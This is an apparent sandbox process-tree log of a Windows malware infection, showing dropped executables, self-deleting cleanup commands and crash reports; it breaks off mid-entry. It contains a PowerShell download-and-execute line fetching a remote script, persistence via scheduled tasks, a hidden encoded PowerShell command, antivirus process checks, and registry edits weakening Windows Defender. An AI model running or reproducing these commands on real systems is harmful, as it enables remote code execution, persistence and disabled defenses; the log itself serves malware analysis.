"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd3c5c46f8,0x7ffd3c5c4708,0x7ffd3c5c4718
8⤵
PID:580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,10560605343352106253,15149607899936063229,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2228 /prefetch:2
8⤵
PID:3260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,10560605343352106253,15149607899936063229,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2280 /prefetch:3
8⤵
PID:5088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2200,10560605343352106253,15149607899936063229,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2792 /prefetch:8
8⤵
PID:1876

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10560605343352106253,15149607899936063229,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3388 /prefetch:1
8⤵
PID:5216

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10560605343352106253,15149607899936063229,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3400 /prefetch:1
8⤵
PID:5260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2200,10560605343352106253,15149607899936063229,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4528 /prefetch:8
8⤵
PID:5432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10560605343352106253,15149607899936063229,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4880 /prefetch:1
8⤵
PID:5708

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10560605343352106253,15149607899936063229,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4612 /prefetch:1
8⤵
PID:4004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2200,10560605343352106253,15149607899936063229,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4624 /prefetch:1
8⤵
PID:3520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2200,10560605343352106253,15149607899936063229,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5816 /prefetch:8
8⤵
PID:5696

C:\Users\Admin\AppData\Local\Temp\cd-18eb3-2e4-998ad-8a35a3ef3dbe0\Lygygeshale.exe
"C:\Users\Admin\AppData\Local\Temp\cd-18eb3-2e4-998ad-8a35a3ef3dbe0\Lygygeshale.exe"
6⤵
PID:3744

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5gwc0at3.a22\GcleanerEU.exe /eufive & exit
7⤵
PID:3224

C:\Users\Admin\AppData\Local\Temp\5gwc0at3.a22\GcleanerEU.exe
C:\Users\Admin\AppData\Local\Temp\5gwc0at3.a22\GcleanerEU.exe /eufive
8⤵
PID:3796

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 452
9⤵
- Program crash
PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 764
9⤵
- Program crash
PID:5592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 772
9⤵
- Program crash
PID:6032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 792
9⤵
- Program crash
PID:5188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 776
9⤵
- Program crash
PID:4348

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1008
9⤵
- Program crash
PID:5672

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 856
9⤵
- Program crash
PID:5440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1368
9⤵
- Program crash
PID:5108

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\5gwc0at3.a22\GcleanerEU.exe" & exit
9⤵
PID:6140

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "GcleanerEU.exe" /f
10⤵
- Kills process with taskkill
PID:6016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3796 -s 1288
9⤵
- Program crash
PID:5492

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3x4igyun.1jm\gcleaner.exe /mixfive & exit
7⤵
PID:4660

C:\Users\Admin\AppData\Local\Temp\3x4igyun.1jm\gcleaner.exe
C:\Users\Admin\AppData\Local\Temp\3x4igyun.1jm\gcleaner.exe /mixfive
8⤵
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 452
9⤵
- Program crash
PID:5200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 764
9⤵
- Program crash
PID:5744

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 772
9⤵
- Program crash
PID:4492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 824
9⤵
- Program crash
PID:6052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 832
9⤵
- Program crash
PID:5980

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 880
9⤵
- Program crash
PID:5260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 836
9⤵
- Program crash
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 1360
9⤵
- Program crash
PID:5628

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\3x4igyun.1jm\gcleaner.exe" & exit
9⤵
PID:6092

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "gcleaner.exe" /f
10⤵
- Kills process with taskkill
PID:5176

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4412 -s 492
9⤵
- Program crash
PID:5392

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0qaabgpv.vyw\mp3studios_96.exe & exit
7⤵
PID:5108

C:\Users\Admin\AppData\Local\Temp\0qaabgpv.vyw\mp3studios_96.exe
C:\Users\Admin\AppData\Local\Temp\0qaabgpv.vyw\mp3studios_96.exe
8⤵
PID:4676

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
9⤵
PID:6080

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
10⤵
- Kills process with taskkill
PID:1968

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
9⤵
PID:5732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd3a014f50,0x7ffd3a014f60,0x7ffd3a014f70
10⤵
PID:5396

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bfcd5xge.edb\random.exe & exit
7⤵
PID:332

C:\Users\Admin\AppData\Local\Temp\bfcd5xge.edb\random.exe
C:\Users\Admin\AppData\Local\Temp\bfcd5xge.edb\random.exe
8⤵
PID:5424

C:\Users\Admin\AppData\Local\Temp\bfcd5xge.edb\random.exe
"C:\Users\Admin\AppData\Local\Temp\bfcd5xge.edb\random.exe" -q
9⤵
PID:5956

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wpjbjf3x.xle\pb1117.exe & exit
7⤵
PID:1588

C:\Users\Admin\AppData\Local\Temp\wpjbjf3x.xle\pb1117.exe
C:\Users\Admin\AppData\Local\Temp\wpjbjf3x.xle\pb1117.exe
8⤵
PID:5568

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\evsxvy2x.jzd\file.exe & exit
7⤵
PID:2956

C:\Users\Admin\AppData\Local\Temp\evsxvy2x.jzd\file.exe
C:\Users\Admin\AppData\Local\Temp\evsxvy2x.jzd\file.exe
8⤵
PID:5628

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://fluxportugal.pt/js/vendor/config_40.ps1')"
9⤵
PID:5860

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command IEX(New-Object Net.Webclient).DownloadString('https://fluxportugal.pt/js/vendor/config_40.ps1')
10⤵
PID:1304

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\evsxvy2x.jzd\file.exe" >> NUL
9⤵
PID:4552

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.1
10⤵
- Runs ping.exe
PID:5612

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mligmsv5.fly\ChromeSetup.exe & exit
7⤵
PID:3364

C:\Users\Admin\AppData\Local\Temp\mligmsv5.fly\ChromeSetup.exe
C:\Users\Admin\AppData\Local\Temp\mligmsv5.fly\ChromeSetup.exe
8⤵
PID:5752

C:\Users\Admin\Pictures\Minor Policy\dllGcvQj4waXvaAJ4ZiAWBWk.exe
"C:\Users\Admin\Pictures\Minor Policy\dllGcvQj4waXvaAJ4ZiAWBWk.exe"
3⤵
- Executes dropped EXE
PID:1328

C:\Users\Admin\AppData\Local\Temp\is-KPIDM.tmp\is-2V9SD.tmp
"C:\Users\Admin\AppData\Local\Temp\is-KPIDM.tmp\is-2V9SD.tmp" /SL4 $4019C "C:\Users\Admin\Pictures\Minor Policy\dllGcvQj4waXvaAJ4ZiAWBWk.exe" 2773519 52736
4⤵
PID:4060

C:\Program Files (x86)\gbSearcher\gbsearcher75.exe
"C:\Program Files (x86)\gbSearcher\gbsearcher75.exe"
5⤵
PID:4564

C:\Users\Admin\AppData\Roaming\{d6dc608d-2a27-11ed-a0e3-806e6f6e6963}\KGU5QTj4PXHnpa.exe
6⤵
PID:3936

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "gbsearcher75.exe" /f & erase "C:\Program Files (x86)\gbSearcher\gbsearcher75.exe" & exit
6⤵
PID:960

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "gbsearcher75.exe" /f
7⤵
- Kills process with taskkill
PID:220

C:\Users\Admin\Pictures\Minor Policy\WGrWP2G6bWZ1GzAC4TIwK8pF.exe
"C:\Users\Admin\Pictures\Minor Policy\WGrWP2G6bWZ1GzAC4TIwK8pF.exe"
3⤵
- Executes dropped EXE
PID:1080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1080 -s 340
4⤵
- Program crash
PID:3688

C:\Users\Admin\Pictures\Minor Policy\RTEazUFMZOgx28yBe5_X0Ltq.exe
"C:\Users\Admin\Pictures\Minor Policy\RTEazUFMZOgx28yBe5_X0Ltq.exe"
3⤵
- Executes dropped EXE
PID:468

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
4⤵
PID:1876

C:\Users\Admin\Pictures\Minor Policy\k9eDC7FnsNpC4WanVW_Ly_fx.exe
"C:\Users\Admin\Pictures\Minor Policy\k9eDC7FnsNpC4WanVW_Ly_fx.exe"
3⤵
PID:3684

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
4⤵
PID:3700

C:\Users\Admin\Pictures\Minor Policy\cH7MoNmAKCMUP8e921bJk0C4.exe
"C:\Users\Admin\Pictures\Minor Policy\cH7MoNmAKCMUP8e921bJk0C4.exe"
3⤵
PID:3288

C:\Users\Admin\Pictures\Minor Policy\6I5ezli8VZ5V3VGE2HiVsIZR.exe
"C:\Users\Admin\Pictures\Minor Policy\6I5ezli8VZ5V3VGE2HiVsIZR.exe"
3⤵
PID:2112

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK HR" /sc HOURLY /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2524

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr ""C:\Program Files (x86)\ClipManagerP0\ClipManager_Svc.exe"" /tn "LOLPA4DESK LG" /sc ONLOGON /rl HIGHEST
4⤵
- Creates scheduled task(s)
PID:2924

C:\Users\Admin\Pictures\Minor Policy\55GUWZCVVahT1xdXBXRv0Zhw.exe
"C:\Users\Admin\Pictures\Minor Policy\55GUWZCVVahT1xdXBXRv0Zhw.exe"
3⤵
PID:788

C:\Windows\SysWOW64\tapiunattend.exe
tapiunattend.exe
4⤵
PID:3136

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Mirrors.mpeg & ping -n 5 localhost
4⤵
PID:4076

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:4292

C:\Windows\SysWOW64\find.exe
find /I /N "avastui.exe"
6⤵
PID:5352

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AvastUI.exe"
6⤵
- Enumerates processes with tasklist
PID:5388

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AVGUI.exe"
6⤵
- Enumerates processes with tasklist
PID:6080

C:\Windows\SysWOW64\find.exe
find /I /N "avgui.exe"
6⤵
PID:5956

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^292552347903647624226686138999204215314705673139493112772742455981043241153$" Button.mpeg
6⤵
PID:780

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Metal.exe.pif
Metal.exe.pif Z
6⤵
PID:3624

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
6⤵
- Runs ping.exe
PID:2304

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
2⤵
- Creates scheduled task(s)
PID:580

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
2⤵
- Creates scheduled task(s)
PID:2352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:884

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1876

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 1080 -ip 1080
1⤵
PID:2088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:1884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 3796 -ip 3796
1⤵
PID:4140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4412 -ip 4412
1⤵
PID:2304

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5172

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3796 -ip 3796
1⤵
PID:5528

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4412 -ip 4412
1⤵
PID:5648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3796 -ip 3796
1⤵
PID:5948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4412 -ip 4412
1⤵
PID:6072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 3796 -ip 3796
1⤵
PID:5224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4412 -ip 4412
1⤵
PID:5808

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3796 -ip 3796
1⤵
PID:4432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4412 -ip 4412
1⤵
PID:5672

C:\Windows\system32\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
1⤵
- Process spawned unexpected child process
PID:5684

C:\Windows\SysWOW64\rundll32.exe
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
2⤵
PID:5632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5632 -s 600
3⤵
- Program crash
PID:780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 5632 -ip 5632
1⤵
PID:1556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3796 -ip 3796
1⤵
PID:3180

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4412 -ip 4412
1⤵
PID:5704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3796 -ip 3796
1⤵
PID:3412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4412 -ip 4412
1⤵
PID:5372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 3796 -ip 3796
1⤵
PID:5084

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4412 -ip 4412
1⤵
PID:4252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 3796 -ip 3796
1⤵
PID:6104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 4412 -ip 4412
1⤵
PID:5640

C:\Users\Admin\AppData\Local\Temp\EDdmQQsRZYMnupcka\VHSmdiHZODWiKhD\eSWHRjH.exe
C:\Users\Admin\AppData\Local\Temp\EDdmQQsRZYMnupcka\VHSmdiHZODWiKhD\eSWHRjH.exe VP /site_id 525403 /S
1⤵
PID:884

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:3676

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
3⤵
PID:5240

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
3⤵
PID:564

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
3⤵
PID:5960

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
3⤵
PID:4852

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
3⤵
PID:5704

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
3⤵
PID:2548

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
3⤵
PID:5392

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
3⤵
PID:5624

C:\Windows\SysWOW64\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
3⤵
PID:1988

C:\Windows\SysWOW64\reg.exe
